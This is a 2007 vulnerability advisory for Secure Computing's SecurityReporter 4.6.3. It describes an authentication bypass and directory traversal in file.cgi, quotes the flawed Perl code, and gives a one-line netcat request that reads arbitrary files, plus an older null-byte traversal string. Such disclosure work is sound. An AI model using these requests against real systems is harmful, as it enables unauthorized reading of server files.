SECURITYREPORTER - AUTHENTICATION BYPASS AND DIRECTORY TRAVERSAL VULNERABILITY Product: SecurityReporter Version: 4.6.3 Build Date: 04/20/2007 Platform: Win32 Vendor: Secure Computing (www.securecomputing.com) Product Description ------------------- "SecurityReporter is a security event analysis and reporting solution for the Sidewinder Security Appliance, providing realtime security intelligence to help decipher hacker/virus behavior, combat security threats, and help meet compliance requirements." Vendor Description ------------------ SecurityReporter is manufactured under an OEM partnership between Secure Computing and eIQnetworks. The product is also known as "Network Security Analyzer". According to eIQnetworks, Security Analyzer is also part of products of the following companies: - Top Layer Networks - Clavister - Astaro - Reflex Security - H3C - Piolink - MiraPoint Vulnerability-Overview ---------------------- SecurityReporter is vulnerable to an authentication bypass and directory traversal attack. It is possible to access files inside and outside the application root directory from remote without authentication. During the installation of SecurityReporter it can be chosen between an dedicated Apache installation (which is included within the install package) and the usage of an pre-installed Internet Information Server. In case of the Apache, access to the files is executed with local system account privileges by default. Exploitation ------------ The following request fetches the sourcecode of the script itself, but can also be used to access any other file on the partition: echo -e "GET /cgi-bin/file.cgi?name=/eventcache/../cgi-bin/file.cgi HTTP/1.0\r\n\r\n" | nc Vulnerability Details --------------------- The authentication can be bypassed because of the following code within "file.cgi": 8 $name = $field{'name'}; 9 10 #for gif images we dont care about authorization so just serve it without 11 #bothering the reporting engine again. See bug: 3676 for details. 12 $dontvalidate = "false"; 13 if ($name =~ /^[a-zA-Z0-9\-\. _\/ ]+\.(gif)$/) { 14 $dontvalidate = "true"; 15 print "Content-Type: image/gif\n"; 16 binmode STDOUT; 17 } 18 elsif ($name =~ /^\/eventcache\//) { 19 $dontvalidate = "true"; 20 print "Content-Type: text/html\n"; 21 binmode STDOUT; 22} If the value of the parameter "name" does not match to line 13 (which can be enforced by not requesting a ".gif" file) the condition in line 18 is checked. If the value of "name" does start with the directory "/eventcache/", $dontvalidate is set to "true", thus disabling uservalidation. (addition: the regex in line 13 could be bypassed with null-byte attack in older versions of this application, by requesting a file like ../../../../boot.ini%00.gif. But this is fixed in the current version within the file GeneralUtilities.pm which is included to most pl-files) The directory traversal is possible because there is no normalization of the input and filtering of dots and slashes/backslashes within "file.cgi": 165 #on windows 2003 IIS the cur dir is the root itself- dont know why so we try to open it in 166 #path relative to root if ../ from cgi-bin fails 167 open(f, "../$name") or open(f, "$name") or die "File ($name): $!"; PATCH ----- All SecurityReporter customers have been sent an email by the venodr, describing the vulnerability with a link to a patch. Discovered ---------- By Oliver Karow (oliver.karow@gmx.de) on Tuesday, 05. June 2007 http://www.oliverkarow.de/research/securityreporter.txt